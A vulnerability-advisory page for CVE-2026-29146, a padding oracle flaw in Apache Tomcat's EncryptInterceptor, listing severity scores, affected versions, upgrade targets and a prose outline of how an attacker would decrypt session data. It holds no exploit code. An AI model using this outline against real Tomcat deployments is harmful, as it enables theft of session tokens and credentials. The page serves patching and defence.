Skip to main content

Tomcat CVE-2026-29146

| EUVDEUVD-2026-21012 HIGH
Error Message Information Leak (CWE-209)
2026-04-09 apache GHSA-h468-7pvh-8vr8
7.5
CVSS 3.1 · Vendor: apache
Share

Severity by source

Vendor (apache) PRIMARY
7.5 HIGH
AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
SUSE
HIGH
qualitative
Red Hat
7.5 HIGH
qualitative

Primary rating from Vendor (apache).

CVSS VectorVendor: apache

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
Attack Vector
Network
Attack Complexity
Low
Privileges Required
None
User Interaction
None
Scope
Unchanged
Confidentiality
High
Integrity
None
Availability
None

Lifecycle Timeline

4
Patch released
Apr 11, 2026 - 02:30 nvd
Patch available
EUVD ID Assigned
Apr 09, 2026 - 19:45 euvd
EUVD-2026-21012
Analysis Generated
Apr 09, 2026 - 19:45 vuln.today
CVE Published
Apr 09, 2026 - 19:21 nvd
HIGH 7.5

Blast Radius

ecosystem impact
† from your stack dependencies † transitive graph · vuln.today resolves 4-path depth
  • 442 maven packages depend on org.apache.tomcat.embed:tomcat-embed-core (33 direct, 409 indirect)
  • 20 maven packages depend on org.apache.tomcat:tomcat-catalina (8 direct, 12 indirect)
  • 9 maven packages depend on org.apache.tomcat:tomcat-tribes (3 direct, 6 indirect)

Ecosystem-wide dependent count for version 9.0.13 and other introduced versions.

DescriptionCVE.org

Padding Oracle vulnerability in Apache Tomcat's EncryptInterceptor with default configuration.

This issue affects Apache Tomcat: from 11.0.0-M1 through 11.0.18, from 10.0.0-M1 through 10.1.52, from 9.0.13 through 9..115, from 8.5.38 through 8.5.100, from 7.0.100 through 7.0.109.

Users are recommended to upgrade to version 11.0.19, 10.1.53 and 9.0.116, which fixes the issue.

AnalysisAI

Padding oracle attack in Apache Tomcat EncryptInterceptor leaks encrypted session data confidentiality across versions 7.0.100-7.0.109, 8.5.38-8.5.100, 9.0.13-9.0.115, 10.0.0-M1-10.1.52, and 11.0.0-M1-11.0.18 when default configuration is deployed. Unauthenticated remote attackers exploit oracle responses to decrypt sensitive information without authentication (CVSS:3.1 AV:N/AC:L/PR:N). …

Unlock full vulnerability intelligence

  • Risk assessment & exploitation conditions
  • Attack chain visualization
  • Remediation with exact patch versions
  • Threat intelligence from 22 sources
  • Personal watchlist & email alerts

Free forever · No credit card required

Attack ChainAIDerived

Hypothetical attack flow derived from CVE metadata

Access
Send encrypted HTTP requests to EncryptInterceptor
Delivery
Observe response timing differences
Exploit
Deduce padding bytes via oracle
Execution
Decrypt session data
Impact
Compromise confidentiality

Vulnerability AssessmentAI

Exploitation Remote unauthenticated attacker against Apache Tomcat 7.0.100–7.0.109, 8.5.38–8.5.100, 9.0.13–9.0.115, 10.0.0-M1–10.1.52, or 11.0.0-M1–11.0.18 with EncryptInterceptor enabled in default configuration. … Additional conditions and limiting factors are described in the full assessment.
Risk Assessment Unauthenticated padding oracle attack on Tomcat EncryptInterceptor enables confidentiality breach with high impact (CVSS 7.5). … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in.
Exploit Scenario Attacker sends crafted encrypted payloads to Tomcat EncryptInterceptor endpoint, observes timing/error responses to deduce padding validity, iteratively decrypts sensitive data (session tokens, credentials). No public exploit identified at time of analysis; unauthenticated network-level access required.
Remediation Vendor-released patch: upgrade to Apache Tomcat 11.0.19, 10.1.53, or 9.0.116 immediately. … Detailed patch versions, workarounds, and compensating controls in full report.

Recommended ActionAI

Within 24 hours: Identify all Tomcat deployments using versions 7.0.100-7.0.109, 8.5.38-8.5.100, 9.0.13-9.0.115, 10.0.0-M1-10.1.52, or 11.0.0-M1-11.0.18 and document active instances. …

Sign in for detailed remediation steps and compensating controls.

Threat intelligence, references, and detailed analysis are available after sign-in.

More in Tomcat

View all
CVE-2025-31650 HIGH POC
7.5 Apr 28

Improper Input Validation vulnerability in Apache Tomcat. Rated high severity (CVSS 7.5), this vulnerability is remotely

CVE-2026-33439 CRITICAL POC
9.3 Apr 07

Remote code execution in OpenIdentityPlatform OpenAM 16.0.5 and earlier allows unauthenticated attackers to execute arbi

CVE-2016-20026 CRITICAL POC
9.3 Mar 15

Critical hardcoded credentials vulnerability in ZKTeco ZKBioSecurity 3.0's bundled Apache Tomcat server that allows unau

CVE-2026-34486 HIGH POC
7.5 Apr 09

Encryption bypass in Apache Tomcat 11.0.20, 10.1.53, and 9.0.116 allows unauthenticated remote attackers to circumvent t

CVE-2025-55752 HIGH POC
7.5 Oct 27

Path traversal in Apache Tomcat versions 9.x through 11.x allows authenticated attackers to bypass security constraints

CVE-2025-41242 MEDIUM POC
5.9 Aug 18

Spring Framework MVC applications can be vulnerable to a “Path Traversal Vulnerability” when deployed on a non-compliant

CVE-2025-11165 CRITICAL
9.9 Feb 24

Sandbox escape in dotCMS Velocity scripting engine (VTools) allows authenticated users to execute arbitrary SQL. CVSS 9.

CVE-2025-31651 CRITICAL
9.8 Apr 28

Improper Neutralization of Escape, Meta, or Control Sequences vulnerability in Apache Tomcat. Rated critical severity (C

CVE-2026-45083 CRITICAL
9.8 May 13

Unauthenticated Solr streaming expression injection in Goobi viewer Core (versions 4.8.0 through 26.04) allows remote at

CVE-2026-43512 CRITICAL
9.8 May 12

DEPRECATED: Authentication Bypass Issues vulnerability in digest authentication in Apache Tomcat. This issue affects Ap

CVE-2026-41293 CRITICAL
9.8 May 12

Improper Input Validation vulnerability in Apache Tomcat. This issue affects Apache Tomcat: from 11.0.0-M1 through 11.0

CVE-2025-55754 CRITICAL
9.6 Oct 27

ANSI escape sequence injection in Apache Tomcat log messages enables console manipulation and social engineering attacks

Vendor StatusVendor

SUSE

Severity: High
Product Status
openSUSE Tumbleweed Fixed
SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS Affected
SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS Affected
SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS Affected
SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS Affected

Share

CVE-2026-29146 vulnerability details – vuln.today

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy